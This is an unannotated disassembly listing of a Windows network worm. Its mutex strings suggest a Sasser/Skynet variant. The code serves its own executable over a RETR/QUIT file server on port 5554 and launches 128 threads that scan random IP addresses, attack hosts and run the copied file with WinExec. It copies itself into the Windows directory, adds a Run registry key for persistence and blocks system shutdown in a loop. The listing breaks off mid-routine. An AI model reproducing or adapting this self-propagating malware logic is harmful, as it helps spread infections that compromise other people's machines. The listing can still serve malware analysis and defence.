call sub_401E6E
pop ecx
mov [ebp+var_14], eax
jmp short loc_401C8C
; ---------------------------------------------------------------------------
loc_401C89: ; CODE XREF: sub_401B46+111�j
push 6
pop edi
loc_401C8C: ; CODE XREF: sub_401B46+135�j
; sub_401B46+141�j
lea eax, [ebp+var_4]
push eax
push 0
call sub_402720
inc edi
pop ecx
cmp edi, 6
pop ecx
mov ebx, eax
jl short loc_401C55
push [ebp+var_2C]
mov edi, [ebp+var_18]
lea eax, [ebp+var_60]
push [ebp+var_30]
shl edi, 8
push [ebp+var_34]
add edi, [ebp+var_14]
push [ebp+var_38]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call dword_4050E0 ; wsprintfA
add esp, 18h
push 0
push off_4068E0
call sub_4022B0
pop ecx
push eax
push off_4068E0
jmp loc_401E15
; ---------------------------------------------------------------------------
loc_401CE2: ; CODE XREF: sub_401B46+D5�j
lea eax, [ebp+var_4E4]
push offset aRetr ; "RETR"
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz loc_401E1A
push 0
push off_4068E4
call sub_4022B0
pop ecx
push eax
push off_4068E4
push ebx
call esi ; send
lea eax, [ebp+var_60]
push eax
call sub_4011D5
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_401DF7
push 10h
lea eax, [ebp+var_28]
push 0
push eax
call sub_402250
add esp, 0Ch
mov [ebp+var_28], 2
push edi
call dword_405108 ; ntohs
push 0
push 1
push 2
mov [ebp+var_26], ax
mov [ebp+var_24], ebx
call dword_40510C ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+var_C], ebx
jz loc_401DF7
lea eax, [ebp+var_28]
push 10h
push eax
push ebx
call dword_405110 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_401D82
push ebx
call dword_405114 ; closesocket
jmp short loc_401DF7
; ---------------------------------------------------------------------------
loc_401D82: ; CODE XREF: sub_401B46+231�j
lea eax, [ebp+var_8E4]
push 400h
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_8E4]
push 0
push eax
call dword_405030 ; _lopen
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz short loc_401DF7
lea eax, [ebp+var_2]
push offset dword_406F48
push eax
call sub_4027C0
mov ebx, dword_40502C
pop ecx
pop ecx
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
loc_401DCC: ; CODE XREF: sub_401B46+2A6�j
call ebx ; _lread
cmp eax, 1
jnz short loc_401DEE
and [ebp+var_1], 0
push 0
push eax
lea eax, [ebp+var_2]
push eax
push [ebp+var_C]
call esi ; send
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
jmp short loc_401DCC
; ---------------------------------------------------------------------------
loc_401DEE: ; CODE XREF: sub_401B46+28B�j
push [ebp+var_8]
call dword_40501C ; _lclose
loc_401DF7: ; CODE XREF: sub_401B46+1DD�j
; sub_401B46+21B�j ...
push [ebp+var_C]
call dword_405114 ; closesocket
push 0
push off_4068DC
call sub_4022B0
pop ecx
push eax
push off_4068DC
loc_401E15: ; CODE XREF: sub_401B46+197�j
push [ebp+arg_0]
jmp short loc_401E50
; ---------------------------------------------------------------------------
loc_401E1A: ; CODE XREF: sub_401B46+1B1�j
lea eax, [ebp+var_4E4]
push offset aQuit ; "QUIT"
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz short loc_401E3A
push ebx
call dword_405114 ; closesocket
jmp short loc_401E52
; ---------------------------------------------------------------------------
loc_401E3A: ; CODE XREF: sub_401B46+2E9�j
push 0
push off_4068DC
call sub_4022B0
pop ecx
push eax
push off_4068DC
loc_401E4F: ; CODE XREF: sub_401B46+8A�j
; sub_401B46+BB�j
push ebx
loc_401E50: ; CODE XREF: sub_401B46+2D2�j
call esi ; send
loc_401E52: ; CODE XREF: sub_401B46+2F2�j
cmp [ebp+var_10], 0
jg loc_401B81
push [ebp+arg_0]
call dword_405114 ; closesocket
pop edi
pop esi
loc_401E67: ; CODE XREF: sub_401B46+10�j
xor eax, eax
pop ebx
leave
retn 4
sub_401B46 endp
; =============== S U B R O U T I N E =======================================
sub_401E6E proc near ; CODE XREF: sub_401B46+119�p
; sub_401B46+129�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
loc_401E76: ; CODE XREF: sub_401E6E+13�j
mov al, [esi]
cmp al, 20h
jz short loc_401E80
cmp al, 9
jnz short loc_401E83
loc_401E80: ; CODE XREF: sub_401E6E+C�j
inc esi
jmp short loc_401E76
; ---------------------------------------------------------------------------
loc_401E83: ; CODE XREF: sub_401E6E+10�j
; sub_401E6E+2E�j
movsx eax, byte ptr [esi]
push eax
call sub_4028B0
test eax, eax
pop ecx
jz short loc_401E9E
movsx ecx, byte ptr [esi]
lea eax, [edi+edi*4]
inc esi
lea edi, [ecx+eax*2-30h]
jmp short loc_401E83
; ---------------------------------------------------------------------------
loc_401E9E: ; CODE XREF: sub_401E6E+21�j
mov eax, edi
pop edi
pop esi
retn
sub_401E6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401EA3 proc near ; DATA XREF: sub_4020C8+79�o
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_40510C ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_401EC7
loc_401EBF: ; CODE XREF: sub_401EA3+63�j
pop edi
xor eax, eax
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_401EC7: ; CODE XREF: sub_401EA3+1A�j
push 15B2h
mov [ebp+var_14], 2
call dword_405108 ; ntohs
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
mov [ebp+var_10], esi
call dword_4050F4 ; bind
cmp eax, 0FFFFFFFFh
jz short loc_401EFF
push 5
push edi
call dword_4050F8 ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_401F08
loc_401EFF: ; CODE XREF: sub_401EA3+4C�j
push edi
call dword_405114 ; closesocket
jmp short loc_401EBF
; ---------------------------------------------------------------------------
loc_401F08: ; CODE XREF: sub_401EA3+5A�j
; sub_401EA3+89�j
push esi
push esi
push edi
call dword_4050FC ; accept
lea ecx, [ebp+var_4]
push ecx
push esi
push eax
push offset sub_401B46
push esi
push esi
call dword_405038 ; CreateThread
push 19h
call dword_405028 ; Sleep
jmp short loc_401F08
sub_401EA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401F2E proc near ; DATA XREF: sub_4020C8+8D�o
var_45C = dword ptr -45Ch
var_458 = dword ptr -458h
var_454 = byte ptr -454h
var_450 = byte ptr -450h
var_438 = byte ptr -438h
var_400 = byte ptr -400h
sub esp, 45Ch
push ebx
mov ebx, dword_4050E0
push ebp
push esi
push edi
mov esi, 0FFh
mov ebp, offset aI_I_I_I ; "%i.%i.%i.%i"
loc_401F48: ; CODE XREF: sub_401F2E+195�j
and [esp+46Ch+var_458], 0
lea eax, [esp+46Ch+var_458]
push 0
push eax
call dword_4050E8 ; InternetGetConnectedState
test eax, eax
jz loc_4020BB
lea eax, [esp+46Ch+var_438]
push eax
call sub_4010D2
pop ecx
lea eax, [esp+46Ch+var_438]
push eax
call dword_405120 ; inet_addr
movsx edi, al
movsx eax, ah
test edi, edi
mov [esp+46Ch+var_45C], eax
jge short loc_401F8C
add edi, 100h
loc_401F8C: ; CODE XREF: sub_401F2E+56�j
cmp [esp+46Ch+var_45C], 0
jge short loc_401F9B
add [esp+46Ch+var_45C], 100h
loc_401F9B: ; CODE XREF: sub_401F2E+63�j
; sub_401F2E+187�j
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401FFB
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401FDE
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
jmp short loc_401FF8
; ---------------------------------------------------------------------------
loc_401FDE: ; CODE XREF: sub_401F2E+8B�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
push [esp+474h+var_45C]
loc_401FF8: ; CODE XREF: sub_401F2E+AE�j
push edi
jmp short loc_402027
; ---------------------------------------------------------------------------
loc_401FFB: ; CODE XREF: sub_401F2E+7B�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
loc_402027: ; CODE XREF: sub_401F2E+CB�j
lea eax, [esp+47Ch+var_454]
push ebp
push eax
call ebx ; wsprintfA
add esp, 18h
lea eax, [esp+468h+var_450]
push 3E8h
push eax
call dword_405120 ; inet_addr
push eax
call sub_401B08
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_40209E
lea eax, [esp+46Ch+var_454]
push eax
call sub_401153
cmp al, 1
pop ecx
jnz short loc_40209E
lea eax, [esp+46Ch+var_400]
push 400h
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [esp+46Ch+var_400]
push offset asc_406A78 ; " "
push eax
call sub_4027D0
lea eax, [esp+474h+var_454]
push eax
lea eax, [esp+478h+var_400]
push eax
call sub_4027D0
add esp, 10h
lea eax, [esp+46Ch+var_400]
push 0
push eax
call dword_40503C ; WinExec
loc_40209E: ; CODE XREF: sub_401F2E+11F�j
; sub_401F2E+12E�j
push 19h
call dword_405028 ; Sleep
lea eax, [esp+46Ch+var_458]
push 0
push eax
call dword_4050E8 ; InternetGetConnectedState
test eax, eax
jnz loc_401F9B
loc_4020BB: ; CODE XREF: sub_401F2E+2E�j
push 19h
call dword_405028 ; Sleep
jmp loc_401F48
sub_401F2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020C8 proc near ; CODE XREF: .text:004029A7�p
var_14 = dword ptr -14h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
mov edi, dword_405048
xor esi, esi
push offset aJobaka3 ; "Jobaka3"
push esi
push esi
call edi ; CreateMutexA
call dword_405044 ; GetTickCount
push eax
call sub_40101E
call sub_401028
push [ebp+arg_8]
call sub_4022B0
pop ecx
test eax, eax
pop ecx
jbe short loc_402111
push [ebp+arg_8]
call sub_401A84
pop ecx
push 1
pop eax
loc_40210B: ; CODE XREF: sub_4020C8+6A�j
pop edi
pop esi
leave
retn 10h
; ---------------------------------------------------------------------------
loc_402111: ; CODE XREF: sub_4020C8+35�j
push 1
call sub_402176
mov [esp+14h+var_14], offset aSkynetsasserve ; "SkynetSasserVersionWithPingFast"
push esi
push esi
call edi ; CreateMutexA
call dword_405040 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_402134
xor eax, eax
jmp short loc_40210B
; ---------------------------------------------------------------------------
loc_402134: ; CODE XREF: sub_4020C8+66�j
mov edi, dword_405038
lea eax, [ebp+var_4]
push ebx
push eax
push esi
push esi
push offset sub_401EA3
push esi
push esi
call edi ; CreateThread
mov ebx, 80h
loc_40214F: ; CODE XREF: sub_4020C8+97�j
lea eax, [ebp+var_8]
push eax
push esi
push esi
push offset sub_401F2E
push esi
push esi
call edi ; CreateThread
dec ebx
jnz short loc_40214F
pop ebx
loc_402162: ; CODE XREF: sub_4020C8+AC�j
push esi
call dword_40500C ; AbortSystemShutdownA
push 0BB8h
call dword_405028 ; Sleep
jmp short loc_402162
sub_4020C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402176 proc near ; CODE XREF: sub_4020C8+4B�p
var_824 = byte ptr -824h
var_425 = byte ptr -425h
var_424 = byte ptr -424h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 824h
push esi
mov esi, 400h
lea eax, [ebp+var_824]
push esi
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_424]
push esi
push eax
call dword_405050 ; GetWindowsDirectoryA
lea eax, [ebp+var_424]
push eax
call sub_4022B0
cmp [ebp+eax+var_425], 5Ch
pop ecx
pop esi
jz short loc_4021CE
lea eax, [ebp+var_424]
push offset asc_406AD4 ; "\\"
push eax
call sub_4027D0
pop ecx
pop ecx
loc_4021CE: ; CODE XREF: sub_402176+43�j
push off_4068C8
lea eax, [ebp+var_424]
push eax
call sub_4027D0
cmp [ebp+arg_0], 0
pop ecx
pop ecx
jz short loc_4021FE
lea eax, [ebp+var_424]
push 0
push eax
lea eax, [ebp+var_824]
push eax
call dword_40504C ; CopyFileA
loc_4021FE: ; CODE XREF: sub_402176+70�j
lea eax, [ebp+var_4]
push eax
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call dword_405000 ; RegOpenKeyA
lea eax, [ebp+var_424]
push eax
call sub_4022B0
pop ecx
push eax
lea eax, [ebp+var_424]
push eax
push 1
push 0
push off_4068C8
push [ebp+var_4]
call dword_405004 ; RegSetValueExA
push [ebp+var_4]
call dword_405008 ; RegCloseKey
leave
retn
sub_402176 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402250 proc near ; CODE XREF: sub_401153+10�p
; sub_401153+40�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_4022A3
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_402297
neg ecx
and ecx, 3
jz short loc_402279
sub edx, ecx
loc_402273: ; CODE XREF: sub_402250+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_402273
loc_402279: ; CODE XREF: sub_402250+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_402297
rep stosd
test edx, edx
jz short loc_40229D
loc_402297: ; CODE XREF: sub_402250+18�j
; sub_402250+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_402297
loc_40229D: ; CODE XREF: sub_402250+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4022A3: ; CODE XREF: sub_402250+A�j
mov eax, [esp+arg_0]
retn
sub_402250 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4022B0 proc near ; CODE XREF: sub_401210+3E�p
; sub_401210+55�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_4022D0
loc_4022BC: ; CODE XREF: sub_4022B0+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_402303
test ecx, 3
jnz short loc_4022BC
add eax, 0
loc_4022D0: ; CODE XREF: sub_4022B0+A�j
; sub_4022B0+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_4022D0
mov eax, [ecx-4]
test al, al
jz short loc_402321
test ah, ah
jz short loc_402317
test eax, 0FF0000h
jz short loc_40230D
test eax, 0FF000000h
jz short loc_402303
jmp short loc_4022D0
; ---------------------------------------------------------------------------
loc_402303: ; CODE XREF: sub_4022B0+11�j
; sub_4022B0+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40230D: ; CODE XREF: sub_4022B0+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402317: ; CODE XREF: sub_4022B0+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402321: ; CODE XREF: sub_4022B0+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_4022B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402330 proc near ; CODE XREF: sub_401398+59�p
; sub_401398+78�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_402350
cmp edi, eax
jb loc_4024C8
loc_402350: ; CODE XREF: sub_402330+16�j
test edi, 3
jnz short loc_40236C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_40238C
rep movsd
jmp off_402478[edx*4]
; ---------------------------------------------------------------------------
loc_40236C: ; CODE XREF: sub_402330+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_402384
and eax, 3
add ecx, eax
jmp dword ptr loc_40238C+4[eax*4]
; ---------------------------------------------------------------------------
loc_402384: ; CODE XREF: sub_402330+46�j
jmp dword ptr loc_402488[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40238C: ; CODE XREF: sub_402330+31�j
; sub_402330+8E�j ...
jmp off_40240C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4023A0
dd offset loc_4023CC
dd offset loc_4023F0
; ---------------------------------------------------------------------------
loc_4023A0: ; DATA XREF: sub_402330+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_40238C
rep movsd
jmp off_402478[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4023CC: ; DATA XREF: sub_402330+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_40238C
rep movsd
jmp off_402478[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4023F0: ; DATA XREF: sub_402330+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_40238C
rep movsd
jmp off_402478[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40240C dd offset loc_40246F ; DATA XREF: sub_402330:loc_40238C�r
dd offset loc_40245C
dd offset loc_402454
dd offset loc_40244C
dd offset loc_402444
dd offset loc_40243C
dd offset loc_402434
dd offset loc_40242C
; ---------------------------------------------------------------------------
loc_40242C: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_402434: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_40243C: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_402444: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_40244C: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_402454: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_40245C: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_40246F: ; CODE XREF: sub_402330:loc_40238C�j
; DATA XREF: sub_402330:off_40240C�o
jmp off_402478[edx*4]
; ---------------------------------------------------------------------------
align 4
off_402478 dd offset loc_402488 ; DATA XREF: sub_402330+35�r
; sub_402330+92�r ...
dd offset loc_402490
dd offset loc_40249C
dd offset loc_4024B0
; ---------------------------------------------------------------------------
loc_402488: ; CODE XREF: sub_402330+35�j
; sub_402330+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_402490: ; CODE XREF: sub_402330+35�j
; sub_402330+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40249C: ; CODE XREF: sub_402330+35�j
; sub_402330+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4024B0: ; CODE XREF: sub_402330+35�j
; sub_402330+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4024C8: ; CODE XREF: sub_402330+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_4024FC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4024F0
std
rep movsd
cld
jmp off_402610[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4024F0: ; CODE XREF: sub_402330+1B1�j
; sub_402330+208�j ...
neg ecx
jmp off_4025C0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4024FC: ; CODE XREF: sub_402330+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_402514
and eax, 3
sub ecx, eax
jmp dword ptr loc_402514+4[eax*4]
; ---------------------------------------------------------------------------
loc_402514: ; CODE XREF: sub_402330+1D6�j
; DATA XREF: sub_402330+1DD�r
jmp off_402610[ecx*4]
; ---------------------------------------------------------------------------
align 4
sub ds:25480040h, ah
inc eax
add [eax+25h], dh
inc eax
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_4024F0
std
rep movsd
cld
jmp off_402610[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_4024F0
std
rep movsd
cld
jmp off_402610[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_4024F0
std
rep movsd
cld
jmp off_402610[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4025C4
dd offset loc_4025CC
dd offset loc_4025D4
dd offset loc_4025DC
dd offset loc_4025E4
dd offset loc_4025EC
dd offset loc_4025F4
off_4025C0 dd offset loc_402607 ; DATA XREF: sub_402330+1C2�r
; ---------------------------------------------------------------------------
loc_4025C4: ; DATA XREF: sub_402330+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_4025CC: ; DATA XREF: sub_402330+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_4025D4: ; DATA XREF: sub_402330+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_4025DC: ; DATA XREF: sub_402330+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_4025E4: ; DATA XREF: sub_402330+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_4025EC: ; DATA XREF: sub_402330+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_4025F4: ; DATA XREF: sub_402330+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_402607: ; CODE XREF: sub_402330+1C2�j
; DATA XREF: sub_402330:off_4025C0�o
jmp off_402610[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_402610 dd offset loc_402620 ; DATA XREF: sub_402330+1B7�r
; sub_402330:loc_402514�r ...
dd offset loc_402628
dd offset loc_402638
dd offset loc_40264C
; ---------------------------------------------------------------------------
loc_402620: ; CODE XREF: sub_402330+1B7�j
; sub_402330:loc_402514�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402628: ; CODE XREF: sub_402330+1B7�j
; sub_402330:loc_402514�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402638: ; CODE XREF: sub_402330+1B7�j
; sub_402330:loc_402514�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40264C: ; CODE XREF: sub_402330+1B7�j
; sub_402330:loc_402514�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_402330 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402670 proc near ; CODE XREF: sub_40159E+8�p
; sub_4037BC+DF�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_402690
loc_40267C: ; CODE XREF: sub_402670+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_40267C
loc_402690: ; CODE XREF: sub_402670+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_402670 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4026A0 proc near ; CODE XREF: sub_401A84+2D�p
; sub_401A84+50�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_40271A
mov dh, [ecx+1]
test dh, dh
jz short loc_402707
loc_4026B8: ; CODE XREF: sub_4026A0+52�j
; sub_4026A0+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_4026DA
test al, al
jz short loc_4026D4
loc_4026C9: ; CODE XREF: sub_4026A0+32�j
mov al, [esi]
inc esi
loc_4026CC: ; CODE XREF: sub_4026A0+3F�j
cmp al, dl
jz short loc_4026DA
test al, al
jnz short loc_4026C9
loc_4026D4: ; CODE XREF: sub_4026A0+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4026DA: ; CODE XREF: sub_4026A0+23�j
; sub_4026A0+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_4026CC
lea edi, [esi-1]
loc_4026E4: ; CODE XREF: sub_4026A0+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_402713
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_4026B8
mov al, [ecx+3]
test al, al
jz short loc_402713
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_4026E4
jmp short loc_4026B8
; ---------------------------------------------------------------------------
loc_402707: ; CODE XREF: sub_4026A0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp sub_402A36
; ---------------------------------------------------------------------------
loc_402713: ; CODE XREF: sub_4026A0+49�j
; sub_4026A0+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_40271A: ; CODE XREF: sub_4026A0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_4026A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402720 proc near ; CODE XREF: sub_401B46+103�p
; sub_401B46+14C�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_402739: ; CODE XREF: sub_402720+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_402739
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_402761
mov edx, dword_406F4C
loc_402761: ; CODE XREF: sub_402720+39�j
; sub_402720+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_402781
test al, al
jz short loc_402781
inc edx
jmp short loc_402761
; ---------------------------------------------------------------------------
loc_402781: ; CODE XREF: sub_402720+58�j
; sub_402720+5C�j
mov ebx, edx
